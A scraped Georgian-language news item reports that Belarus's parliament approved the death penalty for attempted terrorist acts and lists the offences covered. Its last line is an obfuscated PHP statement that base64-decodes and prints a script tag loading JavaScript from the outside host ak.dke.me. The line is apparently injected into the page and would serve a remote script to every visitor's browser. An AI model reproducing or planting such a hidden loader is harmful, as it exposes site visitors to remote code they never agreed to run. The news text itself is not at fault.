celsiusi
ავერსი საქკაბელი
ბელარუსის პარლამენტმა "ტერორისტული თავდასხმის მცდელობისთვის" სიკვდილით დასჯა დაამტკიცა - ამის შესახებ ინფორმაციას ადგილობრივი მედია ავრცელებს. 
 
მედიის ცნობით, სიკვდილით დასჯის შემოღების ინიციატორი ადგილობრივი დეპუტატები არიან. ამიერიდან სიკვდილით დასჯა გათვალისწინებულია:
 
უცხო სახელმწიფოს ან საერთაშორისო ორგანიზაციის წარმომადგენლის მკვლელობის მცდელობა საერთაშორისო გართულებების პროვოცირების მიზნით;
ტერორისტული აქტის ჩადენის მცდელობა, ბირთვული ენერგიის ობიექტების გამოყენებით, რადიოაქტიური ნივთიერებების ან ბირთვული მასალების, ქიმიური ან ბიოლოგიური ნივთიერებების გამოყენებით;
სახელმწიფო ან საზოგადო მოღვაწის მკვლელობის მცდელობა, ტერორისტული აქტის ჩადენის მცდელობისთვის.
 
894
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");